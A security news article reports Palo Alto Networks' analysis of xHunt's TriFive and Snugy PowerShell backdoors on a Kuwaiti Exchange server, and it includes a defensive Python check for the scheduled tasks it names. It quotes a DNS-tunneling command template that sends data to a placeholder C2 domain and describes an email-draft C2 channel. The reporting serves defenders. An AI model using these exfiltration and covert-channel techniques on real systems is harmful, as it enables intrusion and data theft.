Security experts from Palo Alto Networks have spotted two never-before-detected PowerShell backdoors while investigating an attack on Microsoft Exchange servers at an organization in Kuwait.
Experts attribute the attack to a known threat actor tracked as xHunt, aka Hive0081, which was first discovered in 2018. The group has previously targeted the Kuwait government and has also carried out attacks against shipping and transportation organizations.
In the recent attack, the attackers used two newly discovered backdoors tracked as ‘TriFive’ and ‘Snugy’; the latter is a variant of a previously discovered PowerShell-based backdoor tracked as CASHY200.
“The TriFive and Snugy backdoors are PowerShell scripts that provide backdoor access to the compromised Exchange server, using different command and control (C2) channels to communicate with the actors. The TriFive backdoor uses an email-based channel that uses Exchange Web Services (EWS) to create drafts within the Deleted Items folder of a compromised email account.” reads the analysis published by the experts. “The Snugy backdoor uses a DNS tunneling channel to run commands on the compromised server. We will provide an overview of these two backdoors since they differ from tools previously used in the campaign.”
The backdoor samples spotted by the researchers on the compromised Exchange server of a Kuwait government organization used covert channels for C2 communications, including DNS tunneling and an email-based channel using drafts in the Deleted Items folder of a compromised email account.
At the time the report was published, the experts had yet to determine how the threat actors gained access to the Exchange server.
The attack was spotted in September, when Palo Alto Networks was notified that threat actors had breached an organization in Kuwait. The attackers were sending suspicious commands to the Exchange server via the Internet Information Services (IIS) process w3wp.exe.
Further investigation allowed the researchers to discover two scheduled tasks (“ResolutionHosts” and “ResolutionsHosts”, created within the c:\Windows\System32\Tasks\Microsoft\Windows\WDI folder) that the attackers had created to achieve persistence. Both tasks would run malicious PowerShell scripts, and both were created well before the dates of the collected logs, which suggests that the attackers had access to the server before the period covered by the logs.
“The commands executed by the two tasks attempt to run splwow64.ps1 and OfficeIntegrator.ps1, which are backdoors that we call TriFive and a variant of CASHY200 that we call Snugy, respectively.” continues the analysis. “The scripts were stored in two separate folders on the system, which is likely an attempt to avoid both backdoors being discovered and removed.”
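A triage check for the persistence described above, as an added example that is not taken from the Palo Alto Networks analysis or from this article: it parses scheduled-task XML definitions and flags the task names and script names reported here. The `triage_task` helper, the sample task XML and the placeholder script path are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TASK_NAMES = {"resolutionhosts", "resolutionshosts"}      # from the article
SCRIPT_NAMES = {"splwow64.ps1", "officeintegrator.ps1"}   # from the article
PS1_RE = re.compile(r"[^\s\"'\\/]+\.ps1", re.I)           # script basename


def triage_task(name, xml_data):
    """Return reasons to review a task definition; an empty list means no hit.

    xml_data is the task file content (str, or raw bytes read from disk).
    """
    reasons = []
    if name.lower() in TASK_NAMES:
        reasons.append("task name reported for xHunt")
    root = ET.fromstring(xml_data)
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = " ".join((ex.findtext("t:Command", "", NS),
                        ex.findtext("t:Arguments", "", NS)))
        for script in PS1_RE.findall(cmd):
            if script.lower() in SCRIPT_NAMES:
                reasons.append(f"runs reported script {script}")
            elif "powershell" in cmd.lower():
                reasons.append(f"runs PowerShell script {script}")
    # TriFive is described as running every five minutes.
    if reasons and root.findtext(".//t:Repetition/t:Interval", "", NS) == "PT5M":
        reasons.append("repeats every five minutes")
    return reasons


def _task(body):
    # Constructed sample task XML; paths are placeholders, not from the report.
    return f'<Task xmlns="{NS["t"]}">{body}</Task>'


SAMPLES = {
    "ResolutionHosts": _task(
        "<Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval>"
        "</Repetition></TimeTrigger></Triggers><Actions><Exec>"
        "<Command>powershell.exe</Command>"
        r"<Arguments>-File C:\EXAMPLE\a\splwow64.ps1</Arguments>"
        "</Exec></Actions>"),
    "ResolutionHost": _task(  # constructed benign lookalike, no Exec action
        "<Actions><ComHandler><ClassId>{EXAMPLE}</ClassId></ComHandler></Actions>"),
}

if __name__ == "__main__":
    for task_name, xml in SAMPLES.items():
        print(task_name, triage_task(task_name, xml))
```

A task that matches none of the reported names but still launches a `.ps1` file through PowerShell is also returned for review, since the names in the report are easy for an attacker to change.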
Let’s take a closer look at the two backdoors.
The TriFive backdoor is executed every five minutes via a scheduled task. It provides backdoor access to the Exchange server by logging into a legitimate user’s inbox and obtaining a PowerShell script from an email draft within the Deleted Items folder.
The threat actor would log into the same legitimate email account and create an email draft with a subject of “555,” which includes the command in an encrypted and base64 encoded format.
The backdoor would then send the command results back to the attackers by setting the encoded ciphertext as the message body of an email draft, and saving the email again in the Deleted Items folder with the subject of “555s.”
The Snugy PowerShell-based backdoor uses a DNS-tunneling channel to run commands on the compromised Exchange server.
Threat actors leverage the Snugy backdoor to obtain the system’s info, run commands and exfiltrate data from the compromised server.
“The Snugy variant uses the following command to ping a custom crafted domain, which ultimately attempts to resolve the domain before sending the ICMP requests to the resolving IP address:
cmd /c ping -n 1 <custom crafted sub-domain>.<C2 domain>
Snugy will extract the IP address that the ping application resolved using the following regular expression to gather the IP address from the ping results:
continues the analysis.
“Based on the exfiltrated data from within the subdomains, we were able to determine the actors ran ipconfig /all and dir. Unfortunately, we only had a subset of the requests so the data exfiltrated was truncated, which also suggests that the actors likely ran other commands that we did not observe.”
The xHunt campaign is still ongoing; the researchers shared Indicators of Compromise (IoCs) to allow administrators to check whether their environments have been compromised.
(SecurityAffairs – hacking, Microsoft Exchange)